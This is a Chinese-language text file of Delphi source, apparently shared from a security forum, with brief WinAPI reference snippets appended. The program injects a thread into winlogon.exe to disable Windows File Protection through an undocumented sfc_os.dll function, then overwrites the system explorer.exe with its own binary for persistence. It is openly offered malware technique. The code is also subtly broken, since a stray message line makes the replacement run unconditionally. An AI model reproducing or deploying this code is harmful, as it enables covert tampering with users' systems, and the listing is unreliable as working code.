复件 关闭xp保护替换explorer.txt

关闭WINDOWS文件保护WPF 值得一看作者思路不错引用了未公开函数

{*******************************************************}
{                                                       }
{       关闭XP保护。替换explorer.exe                    }
{                                                       }
{       版权所有 (C) 2008 bbs.secdst.net                }
{                                                       }
{*******************************************************}

program Project1;
uses
    Windows,TlHelp32;
function LowerCase(const S: string): string;  //转小写
var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);//Inc(i,j);=>i:=i+j;//Inc(i);=>i:=i+1;   
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;
function CreatedMutexEx(MutexName: Pchar): Boolean;
var
  MutexHandle: dword;
begin
  MutexHandle := CreateMutex(nil, True, MutexName);
  if MutexHandle <> 0 then
  begin
    if GetLastError = ERROR_ALREADY_EXISTS then
    begin
      //CloseHandle(MutexHandle);
      Result := False;
      Exit;
    end;
  end;
  Result := True;
end;
function GetWinPath: string;         //取WINDOWS目录
var
   Buf: array[0..MAX_PATH] of char;
begin
  GetWindowsDirectory(Buf, MAX_PATH);
  Result := Buf;
  if Result[Length(Result)]<>'\' then Result := Result + '\';
end;
function GetTempDirectory: string;  //取临时目录
var
   Buf: array[0..MAX_PATH] of char;
begin
  GetTempPath(MAX_PATH,Buf);
  Result := Buf;
  if Result[Length(Result)]<>'\' then Result := Result + '\';
end;

function EnableDebugPriv : Boolean;      //提权为DEBUG
var
  hToken : THANDLE;
  tp : TTokenPrivileges;
  rl : Cardinal;
begin
  result := false;
  OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
  if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
  begin
    tp.PrivilegeCount := 1;
    tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
  end;
end;
procedure InjectThread(ProcessHandle: DWORD);     //注入winlogon.exe 关闭XP文件保护
var
   TID: LongWord;
   hSfc,hThread: HMODULE;
   pfnCloseEvents: Pointer;
begin
  hSfc := LoadLibrary('sfc_os.dll');
  pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
  FreeLibrary(hSfc);
  hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
  WaitForSingleObject(hThread, 4000);
end;
procedure InitProcess(Name: string);     //查找winlogon.exe进程PID
var
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
  ProcessHandle:dword;
begin
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
  if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
    If Name = LowerCase(FProcessEntry32.szExeFile) then
    begin
      ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
      InjectThread(ProcessHandle);
      CloseHandle(ProcessHandle);
      Break;
    end;
until not  Process32Next(FSnapshotHandle,FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
end;
const ExpFile = 'explorer.exe';
      MasterMutex = 'OpenSoul';
var
  s: string;
begin
  if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
  if  not EnableDebugPriv then Exit;     //提权失败退出
  InitProcess('winlogon.exe') ;                  //注入winlogon.exe   先关闭xp的文件保护 .预防系统的还原
  s := ParamStr(0) ;                     //取当前程序的完整路径+名字
  if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then     //判断自己是不是系统下的explorer.exe
showmessage('目前的explorer.exe不是自己');
  begin                                    //如果不是
  MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING);  //先移动正在运行的explorer.exe
  CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ;  //把自己复制到windows目录 为explorer.exe
  end;
  WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1);     //运行真正的explorer.exe
end.












WinAPI: GetWindowsDirectory - 获取 Windows 所在目录 
//声明:
GetWindowsDirectory(
  lpBuffer: PChar; {缓冲区}
  uSize: UINT      {缓冲区大小}
): UINT;           {返回实际长度}
--------------------------------------------------------------------------------

//举例:
var
  arr: array[0..MAX_PATH] of Char;
  num: UINT;
begin
  num := GetWindowsDirectory(arr, MAX_PATH);
  ShowMessage(arr);           {C:\WINDOWS}
  ShowMessage(IntToStr(num)); {10}
end;



WinAPI: GetTempPath - 获取临时文件夹路径 
//声明:
GetTempPath(
  nBufferLength: DWORD; {缓冲区大小}
  lpBuffer: PChar       {缓冲区}
): DWORD;               {返回实际长度}
--------------------------------------------------------------------------------

//举例:
var
  arr: array[0..MAX_PATH] of Char;
  num: DWORD;
begin
  num := GetTempPath(MAX_PATH, arr);
  ShowMessage(arr);           {C:\DOCUME~1\wy\LOCALS~1\Temp\}
  ShowMessage(IntToStr(num)); {29}
end;